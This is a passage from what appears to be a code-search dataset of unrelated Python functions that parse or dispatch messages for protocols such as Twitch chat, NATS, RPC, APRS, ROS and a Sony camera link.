#print \"config: %i\" % payload[bytesParsed]\n out.append( {'timestamp': self.curtime, 'config': payload[bytesParsed:] } )\n bytesParsed +=1\n\n elif code == RAW_ECG:\n # raw value is between -32768 and 32767, in twos compliment form\n # if the raw value is higher than 32768, it should be rolled around to allow for negative values\n raw = payload[bytesParsed]*256 + payload[bytesParsed]\n if raw >= 32768: \n raw = raw - 65536\n #print \"ecg: %i\" % ecg\n\n # create the timestamp on each ECG sample, starting from the first\n if self.starttime is None:\n self.starttime = time.time()\n self.curtime = self.starttime\n else:\n self.curtime = self.curtime + 1./self.Fs\n\n out.append( {'timestamp': self.curtime, 'ecg_raw': raw } )\n bytesParsed += length\n\n elif code == DEBUG_1:\n #print \"debug1: \" + str(payload[bytesParsed:]).strip('[]')\n out.append( {'timestamp': self.curtime, 'debug1': payload[bytesParsed:] } )\n bytesParsed += length\n\n elif code == DEBUG_2:\n #print \"debug2: \" + str(payload[bytesParsed:]).strip('[]')\n out.append( {'timestamp': self.curtime, 'debug2': payload[bytesParsed:] } )\n bytesParsed += length\n\n else:\n print \"unknown code: %i\" % code\n\n return out", "def _read_message(self):\n if self.__eof:\n return None\n result = {}\n line = sys.stdin.readline()\n 
while line == '\\n':\n line = sys.stdin.readline()\n if not line:\n self.__eof = True\n return None\n s = line.split(\" \", 1)\n result['_number'] = int(s[0])\n result['_text'] = s[1].strip()\n\n while not self.__eof:\n line = sys.stdin.readline()\n if not line:\n self.__eof = True\n return result\n if line == '\\n':\n return result\n s = line.split(\":\", 1)\n result[s[0]] = s[1].strip()", "def _parse_message(self, data):\r\n if TwitchChatStream._check_has_ping(data):\r\n self._maybe_print('got ping')\r\n self._send_pong()\r\n\r\n channel_name_or_false = TwitchChatStream._check_has_channel(data)\r\n if channel_name_or_false:\r\n current_channel = channel_name_or_false[0]\r\n print('Connected to channel: ' + current_channel)\r\n\r\n if TwitchChatStream._check_has_message(data):\r\n msg = {\r\n 'channel': re.findall(r'^:.+![a-zA-Z0-9_]+'\r\n r'@[a-zA-Z0-9_]+'\r\n r'.+ '\r\n r'PRIVMSG (.*?) :',\r\n data)[0],\r\n 'username': re.findall(r'^:([a-zA-Z0-9_]+)!', data)[0],\r\n 'message': re.findall(r'PRIVMSG #[a-zA-Z0-9_]+ :(.+)',\r\n data)[0]\r\n }\r\n if msg['channel'].startswith('#'):\r\n msg['channel'] = msg['channel'][1:]\r\n self._maybe_print(\r\n 'got msg: #{} @{} -- {}'.format(msg['channel'], msg['username'], msg['message']))\r\n return msg\r\n elif len(data):\r\n self._maybe_print('other data: {}'.format(data))\r\n else:\r\n return None", "def handle_message(self, data, task_type, msgtype):\n data['message'] = data['message'].upper()\n return data", "def _parse_reply(self, msg_list): #{\n logger = self.logger\n\n if len(msg_list) < 4 or msg_list[0] != b'|':\n logger.error('bad reply: %r' % msg_list)\n return None\n\n msg_type = msg_list[2]\n data = msg_list[3:]\n result = None\n srv_id = None\n\n if msg_type == b'ACK':\n srv_id = data[0]\n elif msg_type in (b'OK', b'YIELD'):\n try:\n result = self._serializer.deserialize_result(data)\n except Exception, e:\n msg_type = b'FAIL'\n result = e\n elif msg_type == b'FAIL':\n try:\n error = jsonapi.loads(msg_list[3])\n if error['ename'] == 'StopIteration':\n result = StopIteration()\n elif error['ename'] == 'GeneratorExit':\n result = GeneratorExit()\n else:\n result = RemoteRPCError(error['ename'], error['evalue'], error['traceback'])\n except Exception, e:\n logger.error('unexpected error while decoding FAIL', exc_info=True)\n result = RPCError('unexpected error while decoding FAIL: %s' % e)\n else:\n result = RPCError('bad message type: %r' % msg_type)\n\n return dict(\n type = msg_type,\n req_id = msg_list[1],\n srv_id = srv_id,\n result = result,\n )", "def parse_data(self):\n\n msg = self.xml['dom'].childNodes[0]\n self.data = xml_to_dicts(msg, False)\n\n # Get some metadata together\n self.id = \"%s:%s\" % (self.data['src']['name']['#cdata'], self.data['src']['id']['#cdata'])\n self.temp = self.data['tmpr']['#cdata']\n self.watts = self.data['ch1']['watts']['#cdata']\n\n # Time - CurrentCost and local\n self.date = {}\n self.date['cc'] = [ int(self.data['date'][k]['#cdata']) for k in ('dsb','hr','min','sec') ]\n self.date['now'] = localtime()", "def parse(self, data):\n self._data = data\n return self._parse_headers()", "def __parse(self):\n lines = self.data.readlines()\n for i in range(0, len(lines)):\n line = lines[i]\n if line[0] == '#':\n continue\n tokens = line.split(\"\\t\")\n time_str = tokens[self.timecol]\n if time_str.find('start:') != -1:\n time_str = time_str.split()[1] + \" \" + time_str.split()[2]\n self.calls.append((0, 0, 0))\n self.durations.append(0.0)\n elif time_str.find('end:') != -1:\n time_str = 
time_str.split()[1] + \" \" + time_str.split()[2]\n time = datetime.strptime(time_str, \"%Y-%m-%d %H:%M:%S\")\n self.times.append(time)\n self.calls.append((0, 0, 0))\n self.durations.append(0.0)\n break\n else:\n duration = float(tokens[6])\n fms = int(tokens[2])\n hfms = int(tokens[3])\n svs = int(tokens[4])\n self.calls.append((fms, hfms, svs))\n self.durations.append(duration)\n time = datetime.strptime(time_str, \"%Y-%m-%d %H:%M:%S\")\n self.times.append(time)\n self.length = (self.times[len(self.times) - 1] -\\\n self.times[0]).seconds", "def parse(self, data=''):\n self.scratch += data\n for i in self.scratch:\n if self.state == AWAITING_CONTROL_LINE:\n\n # MSG\n if self.scratch.startswith(MSG_OP):\n self.state = AWAITING_MSG_ARG\n\n # OK\n elif self.scratch.startswith(OK):\n # No op. But still consume OK from buffer and set next state.\n if len(self.scratch) > OK_SIZE:\n self.scratch = self.scratch[OK_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR\n elif self.scratch.startswith(ERR_OP):\n self.state = AWAITING_MINUS_ERR_ARG\n\n # PONG\n elif self.scratch.startswith(PONG):\n self.nc._process_pong()\n\n if len(self.scratch) > PONG_SIZE:\n self.scratch = self.scratch[PONG_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # PING\n elif self.scratch.startswith(PING):\n self.nc.send_command(PONG)\n if len(self.scratch) > PING_SIZE:\n self.scratch = self.scratch[PING_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n elif self.state == AWAITING_MSG_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n args = line.split(_SPC_)\n\n # Check in case of using a queue\n args_size = len(args)\n if args_size == 5:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = args[3]\n self.needed = int(args[4])\n elif args_size == 4:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = \"\"\n self.needed = int(args[3])\n else:\n raise ErrProtocol(\"Wrong number of arguments in MSG\")\n self.scratch = self.scratch[i+CRLF_SIZE:]\n self.state = AWAITING_MSG_PAYLOAD\n\n elif self.state == AWAITING_MSG_PAYLOAD:\n if len(self.scratch) >= self.needed:\n payload = self.scratch[:self.needed]\n subject = self.msg_arg[\"subject\"]\n sid = self.msg_arg[\"sid\"]\n reply = self.msg_arg[\"reply\"]\n\n # Set next stage already before dispatching to callback\n self.scratch = self.scratch[self.needed:]\n self.state = AWAITING_MSG_END\n\n msg = Msg(subject=subject, sid=sid, reply=reply, data=payload)\n self.nc._process_msg(msg)\n\n elif self.state == AWAITING_MSG_END:\n i = self.scratch.find(MSG_END)\n if i > 0:\n self.scratch = self.scratch[i+1:]\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR 'error'\n elif self.state == AWAITING_MINUS_ERR_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n _, err = line.split(_SPC_, 1)\n self.nc._process_err(err)\n if len(self.scratch) > i+CRLF_SIZE:\n self.scratch = self.scratch[i+CRLF_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE", "def send_and_parse(self, cmd):\n\n lines = self.__send(cmd)\n messages = self.__protocol(lines)\n return messages", "def on_data(self, raw_data):\n data = json.loads(raw_data)\n\n if \"in_reply_to_status_id\" in data:\n status = Status.parse(None, data)\n return self.on_status(status)\n if \"delete\" in data:\n delete = data[\"delete\"][\"status\"]\n return self.on_delete(delete[\"id\"], 
delete[\"user_id\"])\n if \"disconnect\" in data:\n return self.on_disconnect_message(data[\"disconnect\"])\n if \"limit\" in data:\n return self.on_limit(data[\"limit\"][\"track\"])\n if \"scrub_geo\" in data:\n return self.on_scrub_geo(data[\"scrub_geo\"])\n if \"status_withheld\" in data:\n return self.on_status_withheld(data[\"status_withheld\"])\n if \"user_withheld\" in data:\n return self.on_user_withheld(data[\"user_withheld\"])\n if \"warning\" in data:\n return self.on_warning(data[\"warning\"])\n\n log.error(\"Received unknown message type: %s\", raw_data)", "def message_parser(msg):\n # Start a new message\n new_msg = {\n \"messageType\": msg[\"messageType\"],\n \"messageID\": msg[\"messageID\"],\n \"messageURL\": msg[\"messageURL\"],\n \"messageIssueTime\": msg[\"messageIssueTime\"],\n 'messageBody': {}\n }\n # Break down the incoming message's messageBody and save to new message\n sections = msg[\"messageBody\"].split(\"\\n## \")\n for part in sections:\n try:\n header, body = part.split(\":\", 1) # only split on first occurrence of colon, not all occurrences (ie dates)\n header = header.strip(\"##\").replace(\" \", \"_\").lower() # clean up headers\n body = body.lstrip(\" \").replace(\"\\n\", \" \").replace(\"#\", \"\")\n if header:\n new_msg[\"messageBody\"][header] = body\n except ValueError:\n continue\n # Break down notes if present and save to new message\n if \"notes\" in new_msg[\"messageBody\"] and new_msg[\"messageBody\"][\"notes\"]:\n try:\n notes_wo_dsc = new_msg[\"messageBody\"][\"notes\"].split(\"Disclaimer\")[0] # First set the important stuff to a var\n new_msg[\"messageBody\"][\"notes\"] = {} # now turn notes into an object\n parent_header, children = notes_wo_dsc.split(\":\", 1)\n parent_header = parent_header.lstrip(\" \")\n new_msg[\"messageBody\"][\"notes\"][parent_header] = {} # make a new object for more children\n child_parts = children.split(\" \")\n child_header = None\n new_body = \"\"\n for part in child_parts:\n if part.endswith(\":\"):\n child_header = part.strip(\":\")\n else:\n new_body += part + \" \"\n if child_header:\n new_msg[\"messageBody\"][\"notes\"][parent_header][child_header] = new_body\n except ValueError:\n pass\n # We don't need the disclaimers taking up memory\n if \"disclaimer\" in new_msg[\"messageBody\"]:\n del new_msg[\"messageBody\"][\"disclaimer\"]\n return new_msg", "def process_messages(self):\n pass", "def parse(cls, s):\n raise NotImplementedError", "def __processMsg(self, sock, msgData):\n\n pass", "def parse(self, serialized):\n raise NotImplementedError(\"Calling an abstract method.\")", "def parse(self): \n pass", "def parse_data( self ):\n self.parsed_data = dict( self.results )", "def parse_and_decode(cls, data: bytes) -> \"Message\":\n if len(data) < cls.calc_size() + 1:\n raise NotEnoughData()\n if data[0] != cls.type:\n raise InvalidType()\n\n return cls(*unpack('<' + cls.fmt, data[1:cls.calc_size() + 1]))", "def parse(self):\n raise NotImplementedError(\"Parse not specified!\")", "def __call__(self,data):\n\n log.debug('got data: %s' % (len(data)))\n\n # if we don't have args yet, these must be them\n if not self.args:\n self.parse_args(data)\n\n else:\n # we've already got args, must\n # be a message\n self.handle_send(data)", "def parse_messages(self, orig):\n data=orig[1:len(orig)-1]\n output=[]\n for i in range(0, len(data), 3):\n message_data=data[i].split(',')\n message_text=data[i+1]\n output.append({'status':message_data[1], 
'number':message_data[2],'date':message_data[4],'time':message_data[5],'text':message_text})\n return output", "def handle_data(self, data):\n if verbose(): print(\"TIParser.handle_data(self, '%s')\" % (data))\n pass", "def process_MESSAGE_TYPE_EMG(self, raw):\n\n pass", "def parse(self):\n\t\tfor part in self.mail.walk():\n\t\t\tself.process_part(part)", "def parse(self):\n return []", "def process_messages(self):\n for each_message in self.unprocessed_messages:\n if not ( 'message_type' in each_message):\n logging.error(\"(%s:%d) invalid message found...ignoring the message\",\\\n self.ip, self.port)\n else:\n if ( each_message['message_type'] is 'unchoke'):\n self.is_choking = 0\n elif ( each_message['message_type'] is 'choke'):\n self.is_choking = 1\n elif ( each_message['message_type'] is 'interested'):\n self.is_interested = 1\n elif ( each_message['message_type'] is 'not interested'):\n self.is_interested = 0\n elif ( each_message['message_type'] is 'have'):\n self.pieces.append(each_message['piece_index'])\n elif ( each_message['message_type'] is 'bitfield'):\n bitfield = each_message['bitfield']\n for index, each_bit in enumerate(bitfield):\n if ( each_bit is '1'):\n self.pieces.append(index)", "def __init__(self, msg_type=UNKNOWN, data=None):\r\n\r\n # The message class represents that class of message, i.e., STATUS, CONFIG, DEBUG, ACTION\r\n self.msg_class = self.UNKNOWN\r\n # The message type represents the sub-class of message, i.e., ODOMETRY, MOVE, etc. Note: the same message\r\n # type can appear under different classes, e.g., Operational State is both a Config and Status message\r\n self.msg_type = msg_type\r\n # The payload is a list representation of the data contained in the message. Design decision is to keep the\r\n # type as list because it is easy to convert it to a string as necessary, typically for printing.\r\n self.payload = None\r\n\r\n self.msg = \"\"\r\n\r\n # We do this part if we are creating a message from parameters, e.g. a list\r\n # and we need to create a string that can be sent over the serial port\r\n if type(data) is list:\r\n self._parse_list_msg(data)\r\n\r\n # We do this part if we are creating a message from a string received over the serial port\r\n # e.g., the data received is a string that needs to be parsed\r\n elif type(data) is str or type(data) is unicode: # This can be either 'str' or 'unicode'. 
Both are handled basically as string\r\n self.msg = data.lstrip().rstrip()\r\n result = self._is_valid(self.msg)\r\n if result:\r\n self._parse_str_msg(self.msg)\r\n else:\r\n raise SerialMessageError(\"Failed to validate data: \", data)\r\n else:\r\n raise SerialMessageError(\"Unknown handled for data: \", type(data))", "def receive(self):\n data = self._read()\n if data == b'':\n return None\n\n type = self.MsgHeader.unpack(data).type\n data = data[self.MsgHeader.size:]\n\n if type == self.SONY_MSG_Common:\n header = self.CommonMsgHeader.unpack(data)\n data = data[self.CommonMsgHeader.size:header.size]\n if header.type == self.SONY_MSG_Common_Hello:\n n = self.ProtocolMsgHeader.unpack(data).numProtocols\n protos = (self.ProtocolMsgProto.unpack(data, self.ProtocolMsgHeader.size+i*self.ProtocolMsgProto.size) for i in range(n))\n return InitResponseMessage([(p.name, p.id) for p in protos])\n elif header.type == self.SONY_MSG_Common_Bye:\n raise Exception('Bye from camera')\n else:\n raise Exception('Unknown common message type: 0x%x' % header.type)\n\n elif type == self.SONY_MSG_Tcp:\n header = self.CommonMsgHeader.unpack(data)\n data = data[self.CommonMsgHeader.size:header.size]\n tcpHeader = self.TcpMsgHeader.unpack(data)\n data = data[self.TcpMsgHeader.size:]\n if header.type == self.SONY_MSG_Tcp_ProxyConnect:\n proxy = self.ProxyConnectMsgHeader.unpack(data)\n host = data[self.ProxyConnectMsgHeader.size:self.ProxyConnectMsgHeader.size+proxy.hostSize]\n return SslStartMessage(tcpHeader.socketFd, host.decode('latin1'), proxy.port)\n elif header.type == self.SONY_MSG_Tcp_ProxyDisconnect:\n return SslEndMessage(tcpHeader.socketFd)\n elif header.type == self.SONY_MSG_Tcp_ProxyData:\n size = self.SslDataMsgHeader.unpack(data).size\n return SslSendDataMessage(tcpHeader.socketFd, data[self.SslDataMsgHeader.size:self.SslDataMsgHeader.size+size])\n else:\n raise Exception('Unknown tcp message type: 0x%x' % header.type)\n\n elif type == self.SONY_MSG_Rest:\n header = self.RestMsgHeader.unpack(data)\n data = data[self.RestMsgHeader.size:self.RestMsgHeader.size+header.size]\n if header.type == self.SONY_MSG_Rest_Out:\n return ResponseMessage(data)\n elif header.type == self.SONY_MSG_Rest_In:\n return RequestMessage(data)\n else:\n raise Exception('Unknown rest message type: 0x%x' % header.type)\n\n else:\n raise Exception('Unknown message type: 0x%x' % type)", "def parse_message(data):\r\n\tlist_data = data.split(\"|\")\r\n\tcmd = list_data[0]\r\n\tif len(list_data) != 3 or len(cmd) != CMD_FIELD_LENGTH:\r\n\t\treturn None, None\r\n\tdata_len = list_data[1].replace(\" \", \"\")\r\n\tif len(data_len) != LENGTH_FIELD_LENGTH or not data_len.isdigit():\r\n\t\treturn None, None\r\n\tmsg = list_data[2]\r\n\tdata_len = int(data_len)\r\n\tif len(msg) != data_len \\\r\n\t\tor not 0 <= data_len <= 9999:\r\n\t\treturn None, None\r\n\tcmd = cmd.replace(\" \", \"\") # remove spaces\r\n\t# The function should return 2 values\r\n\treturn cmd, msg", "def _parse_response(resp):\n for header in resp['payload']['headers']:\n if header['name'] == 'From':\n email = _parse_email_value(header['value'])\n sender_user_id = EMAIL_TO_USER_ID.get(email)\n if not sender_user_id:\n print(\"sender_user_id not found {}\".format(email))\n return\n\n if resp['payload']['mimeType'] in ['text/html', 'text/plain']:\n encoded_data = resp['payload']['body']['data'].encode('utf-8')\n body = base64.urlsafe_b64decode(encoded_data)\n else:\n # unclear if other options may come through\n print(\"found new mimeType: {}, id: 
{}\".format(resp['payload']['mimeType'], resp['id']))\n return\n\n # we only care about chat labels for now\n label = 'chats' if 'chats' in resp['labelIds'] else None\n time_secs = int(resp['internalDate']) / 1000 # convert to seconds\n timestamp = datetime.fromtimestamp(time_secs)\n\n return MessageData(\n body=body,\n timestamp=timestamp,\n message_id=resp['id'],\n label=label,\n data=json.dumps(resp),\n sender_user_id=sender_user_id,\n thread_id=resp['threadId']\n )", "def parse_message(self, message):\n # This should run in a separate thread\n message = pickle.loads(message)\n self.logger.log_bytes(message)\n\n if message[0] == \"set\":\n return self.cache.set(message[1], message[2])\n\n elif message[0] == \"del\":\n return self.cache.delete(message[1])\n\n elif message[0] == \"get\":\n return self.cache.get(message[1])\n\n elif message[0] == \"add\":\n return self.cache.add(message[1], message[2])\n\n else:\n print(\"Only these keywords are supported: get, set, delete\")\n\n return message", "def after_parsing(self):", "def processCompleteMessage(self, msg):\r\n try:\r\n msgType = msg['type']\r\n data = msg['data']\r\n except KeyError as e:\r\n raise InvalidRequest('Message is missing key: {0}'.format(e))\r\n\r\n if msgType == types.DATA_MESSAGE:\r\n self._process_DataMessage(data)\r\n elif msgType == types.CONFIGURE_COMPONENT:\r\n self._process_configureComponent(data)\r\n elif msgType == types.CONFIGURE_CONNECTION:\r\n self._process_configureConnection(data)\r\n elif msgType == types.CREATE_CONTAINER:\r\n self._process_createContainer(data)\r\n elif msgType == types.DESTROY_CONTAINER:\r\n self._process_destroyContainer(data)\r\n else:\r\n raise InvalidRequest('This message type is not supported.')", "def parse_webhook_data(self, data):\n\n message = data['message']\n\n self.chat_id = message['chat']['id']\n self.incoming_message_text = message['text'].lower()\n self.first_name = message['from']['first_name']\n if 'last_name' in message['from']:\n self.last_name = message['from']['last_name']", "def deserialize(self, data):\r\n self.res = data.split()\r\n return self.search_deserialize()", "def parse(data):\n parser=Parser(data, True)\n return parser.parse()", "def _parseRecords(self):\n # dict of parse methods for most common records that will be stored in structured arrays\n FLAG2METHOD = {'PS' : self.parseHighPassRecord,\n 'PC' : self.parseLowPassRecord,\n 'VD' : self.parseDigitalSValRecord}\n # dict of (record type, listname to store it in) tuples\n FLAG2REC = {'L' : (LayoutRecord, 'layoutrecords'),\n 'MS' : (SurfMessageRecord, 'messagerecords'),\n 'MU' : (UserMessageRecord, 'messagerecords'),\n 'PE' : (EpochRecord, 'epochrecords'),\n 'D' : (DisplayRecord, 'displayrecords'),\n 'VA' : (AnalogSValRecord, 'analogsvalrecords')}\n f = self.f\n while True:\n # returns an empty string when EOF is reached\n flag = f.read(2).rstrip(NULL).decode() # TODO: should this strip NULL?\n if flag == '':\n break\n # put file pointer back to start of flag\n f.seek(-2, 1) # TODO: unnecessary - doesn't this slow down parsing quite a bit?\n if flag in FLAG2METHOD: # these are the most common\n FLAG2METHOD[flag](f) # call the method\n elif flag in FLAG2REC:\n rectype, reclistname = FLAG2REC[flag]\n rec = rectype()\n rec.parse(f)\n #wx.Yield() # allow wx GUI event processing during parsing\n self._appendRecord(rec, reclistname)\n else:\n raise ValueError('Unexpected flag %r at offset %d' % (flag, f.tell()))\n #self.percentParsed = f.tell() / self.filesize * 100", "def parse(self, data, s):\n fn = 
s.fileno()\n\n perf = re.compile(\"<xml><perf>(\\d+)</perf></xml>\")\n numbers = re.compile(\"<xml>(?:<number>(\\d+)</number>)+</xml>\")\n\n if not self.accepting:\n self.mq[fn].put_nowait(\"die\\n\")\n self.inputs.remove(s)\n else:\n self.log(\"Recieved %s from %s\", repr(data),\n self.conns[s].addr)\n\n has_perf = perf.match(data)\n has_nums = numbers.match(data)\n\n if data == \"quit\":\n # Goto self.signal\n kill(getpid(), SIGINT)\n elif data == \"current\":\n worker = self.curWorker\n if not worker:\n worker = \"None\"\n self.mq[fn].put(str(worker) + '\\n')\n elif has_perf:\n self.mq[fn].put(\"<xml><range>\"+str(self.seqNum)+\"</range></xml>\")\n self.seqNum += int(has_perf.group(1))\n self.curWorker = str(self.conns[s])\n self.log(\"Sequence now: %s\", self.seqNum)\n elif has_nums:\n self.perfect_numbers.append(list(has_nums.groups()))\n self.log(\"Found perfect numbers: %s\",\n str(list(has_nums.groups())))\n\n if s not in self.outputs:\n self.outputs.append(s)", "def _decode(self, msgCls, data):\r\n rosMsg = msgCls()\r\n\r\n for (slotName, slotType) in zip(rosMsg.__slots__, rosMsg._slot_types):\r\n if slotName not in data:\r\n continue\r\n\r\n if '[]' == slotType[-2:]:\r\n listBool = True\r\n slotType = slotType[:-2]\r\n else:\r\n listBool = False\r\n\r\n field = data[slotName]\r\n\r\n if listBool and not isinstance(field, (list, tuple)):\r\n raise TypeError('Given data does not match the definition of '\r\n 'the ROS message.')\r\n\r\n if slotType == 'string':\r\n convFunc = _stringify\r\n elif slotType in self._BASE_TYPES:\r\n convFunc = self._BASE_TYPES[slotType]\r\n elif slotType in self._SPECIAL_TYPES:\r\n convFunc = self._SPECIAL_TYPES[slotType]().decode\r\n elif slotType in self._customTypes and _checkIsStringIO(field):\r\n convFunc = self._customTypes[slotType][0]().decode\r\n else:\r\n convFunc = partial(self._decode,\r\n self._loader.loadMsg(*slotType.split('/')))\r\n\r\n if listBool:\r\n convFunc = partial(map, convFunc)\r\n\r\n setattr(rosMsg, slotName, convFunc(field))\r\n\r\n return rosMsg", "def _parse_data(data: str) -> Tuple[str, str, str, int, int, int, str]:\n\n phg = None\n rng = None\n dfs = None\n course = None\n speed = None\n altitude = None\n comment = None\n\n if re.match(r'^PHG[0-9]{4}', data[:7]):\n # Packet has a PHG (power, antenna height/gain/directivity) value\n phg = data[3:7]\n logger.debug(\"PHG is {}\".format(phg))\n data = data[7:]\n\n elif re.match('^RNG[0-9]{4}', data[:7]):\n # Packet has an RNG (radio range) value\n rng = data[3:7]\n logger.debug(\"RNG is {}\".format(rng))\n data = data[7:]\n\n elif re.match('^DFS[0-9]{4}', data[:7]):\n # Packet has a DFS (DF signal strength, antenna height/gain/directivity) value\n dfs = data[3:7]\n logger.debug(\"DFS is {}\".format(dfs))\n data = data[7:]\n\n elif re.match('^[0-9]{3}/[0-9]{3}', data[:7]):\n # Packet has course and speed values\n course = int(data[:3])\n speed = int(data[4:7])\n logger.debug(\"Course is {}, speed is {}\".format(course, speed))\n data = data[7:]\n\n # TODO - parse BRG/NRQ\n\n # Check for comment\n if len(data) > 0:\n\n # Check for altitude\n # As per APRS 1.01 C6 P26, altitude as /A=nnnnnn may appear anywhere in the comment\n has_altitude = re.match('.*/A=([0-9]{6}).*', data)\n if has_altitude:\n # TODO - fix altitude format\n altitude = int(has_altitude.groups()[0])\n logger.debug(\"Altitude is {} ft\".format(altitude))\n\n # Strip out the altitude from the comment\n data = re.sub(r'/A=[0-9]{6}', \"\", data)\n\n # Set the comment as the remainder of the information field\n 
comment = data\n logger.debug(\"Comment is {}\".format(comment))\n\n return (phg, rng, dfs, course, speed, altitude, comment)", "def parse_record(self, record):\n raise NotImplementedError()", "def parse(self, buf: memoryview, params: Params) \\\n -> tuple[ParseableTypeT_co, memoryview]:\n ...", "def parse_xml_data(self, xml_post_data):\n try:\n read_handler = parse_xmlrpc(xml_post_data)\n except:\n raise ValueError(ERR_MSG % xml_post_data[:50])\n else:\n # Tried to do this with self.update but it was failing :S\n for k, v in read_handler.get_data_container().items():\n self[k] = v", "def _parse_data(self, queue_msg):\r\n try:\r\n result = json.loads(queue_msg)\r\n except (TypeError, ValueError):\r\n log.error(\"External message should be a JSON serialized dict.\"\r\n \" Received queue_msg = %s\", queue_msg)\r\n raise\r\n msg = result['msg']\r\n return msg", "def __parse(self, ch, method, properties, body: bytes):\n input_msg = body.decode()\n request = json.loads(input_msg)\n answer_msg = {}\n err_code = 0\n err_msg = \"\"\n req_id = request.get(\"id\")\n try:\n tag = request[\"tag\"]\n if tag == \"who_are_you\":\n answer_msg = self.whoami()\n elif tag == \"task\":\n answer_msg = self.generate()\n else:\n err_code = -2\n err_msg = \"Unexpected param\"\n except KeyError:\n err_code = -1\n err_msg = \"Error request parsing\"\n finally:\n self.__answer(json.dumps({\"req_id\": req_id,\n \"data\": answer_msg,\n \"err\": {\"code\": err_code,\n \"msg\": err_msg}}))", "def __parse_message_as(msg_type: type, msg_str: str) -> Any:\n # parse the message\n msg_dict = json.loads(msg_str)\n\n # the type specified in the message needs to match\n # the type we are parsing as\n assert msg_dict[MSG_TYPE_NAME] == msg_type.__name__, \\\n f\"Message type did not match the parsing type,\" \\\n f\"parsing the message as type {msg_type.__name__},\" \\\n f\"but get a message of type {msg_dict[MSG_TYPE_NAME]}\"\n\n # remove the message type information, and create the object\n del msg_dict[MSG_TYPE_NAME]\n return msg_type(**msg_dict)", "def _unwrap(self, msg):\n return msg['content']['data']", "def deserialize(self, data):", "def parse(cls, buf: memoryview, params: Params) \\\n -> tuple[AnyParseable, memoryview]:\n for data_type in params.expected:\n try:\n return data_type.parse(buf, params)\n except NotParseable:\n pass\n raise UnexpectedType(buf)", "def fromData(self, data):\n\n self.reset()\n request = \"\"\n version = None\n args = {}\n\n # Parse raw data to construct message (strip empty lines)\n lines = [line.strip() for line in data.splitlines() if line.strip() != \"\"]\n # If message is empty, return false\n if not lines:\n return False\n # Parse request line\n requestLinePattern = re.compile(r'^\\s*(\\w+)\\s+SOLIPSIS/(\\d+\\.\\d+)\\s*$')\n requestLineMatch = requestLinePattern.match(lines[0])\n if requestLineMatch is None:\n raise EventParsingError(\"Invalid request syntax: \" + lines[0])\n\n # Request is first word of the first line (e.g. 
NEAREST, or BEST ...)\n request = requestLineMatch.group(1).upper()\n # Extract protocol version\n version = float(requestLineMatch.group(2))\n\n # Basic sanity check\n if version > VERSION:\n raise EventParsingError(\"Unexpected protocol version: %s\" % str(version))\n elif version < VERSION:\n self.logger.info(\"Received message from older protocol version: %s\" % str(version))\n if not REQUESTS.has_key(request):\n raise EventParsingError(\"Unknown request: \" + request)\n\n # Get args for this request\n argList = REQUESTS[request]\n\n # Now let's parse each parameter line in turn\n argPattern = re.compile(r'^\\s*([-\\w]+)\\s*:\\s*(.*?)\\s*$')\n for line in lines[1:]:\n argMatch = argPattern.match(line)\n if argMatch is None:\n raise EventParsingError(\"Invalid message syntax:\\r\\n\" + data)\n\n # Get arg name and arg value\n argName = argMatch.group(1)\n argVal = argMatch.group(2)\n\n # Log optional\n if argName not in argList:\n self.logger.debug(\"Optional argument '%s' in message '%s'\" % (argName, request))\n\n # Each arg has its own syntax-checking regex\n # (e.g. for a calibre we expect a 3-digit number)\n if ARGS_SYNTAX.has_key(argName):\n argSyntax = re.compile('^' + ARGS_SYNTAX[argName] + '$')\n else:\n raise EventParsingError(\"Unknown arg '%s'\" % (argName))\n if not argSyntax.match(argVal):\n raise EventParsingError(\"Invalid arg syntax for '%s': '%s'\" % (argName, argVal))\n\n # The syntax is correct => add this arg to the arg list\n if args.has_key(argName):\n raise EventParsingError(\"Duplicate value for arg '%s'\" % argName)\n args[argName] = ARGS_CONSTRUCTOR[argName](argVal)\n\n # Check that all required fields have been encountered\n for argName in argList:\n if not args.has_key(argName):\n raise EventParsingError(\"Missing argument '%s' in message '%s'\" % (argName, request))\n\n # Everything's ok\n self.request = request\n self.args = args\n self.data = data\n return True", "def __init__(self):\n self.type = None\n self.msg = \"\"\n self.process = None\n self.edge_id = None", "def parse(self):\n if not self.header_parsed:\n self.parse_header()", "def parseResult(self):\n\n # parse all WHYPO tags\n result = []\n for msg in [m for m in self.msg if \"WHYPO\" in m]:\n result.append({})\n\n for prop in self.pattern.findall(msg):\n key = prop.split(\"=\")[0]\n value = prop.split('\"')[1]\n\n if key == \"CM\":\n try:\n value = float(value)\n except:\n pass\n if key == \"CLASSID\":\n try:\n value = int(value)\n except:\n pass\n result[-1][key] = value\n\n return result", "def populate_data_from_message(self, msg):\n for field in self:\n try:\n setattr(field, 'data', getattr(msg, field.name))\n except:\n continue", "def parse(self, data):\n\n ## before actions\n if OPTIONS['enter-exit-debug']:\n self.__class__._recurse_depth += 1\n print str(self.__class__._recurse_depth) + \": Entering 'do_parse' for: \"+self.__class__.__name__+\" with '\"+data.peek_clean()+\"'\"\n\n ## real work\n result = self.do_parse(data)\n\n ## after actions\n if OPTIONS['enter-exit-debug']:\n self.__class__._recurse_depth -= 1\n print str(self.__class__._recurse_depth) + \": Leaving 'do_parse' for: \"+self.__class__.__name__+\"(\"+str(bool(result))+\")\"+\" with '\"+data.peek_clean()+\"'\"\n\n return result", "def _process_message(self, obj):\n pass", "def handle_message(self, data):\r\n print data\r\n\r\n #video stream starts\r\n if data[:13] == 'video_stream:':\r\n #port will be between 3000 to 7000\r\n port = int(data[13:17])\r\n self.partnum = int(data[18:])\r\n\r\n #creates a video file in 
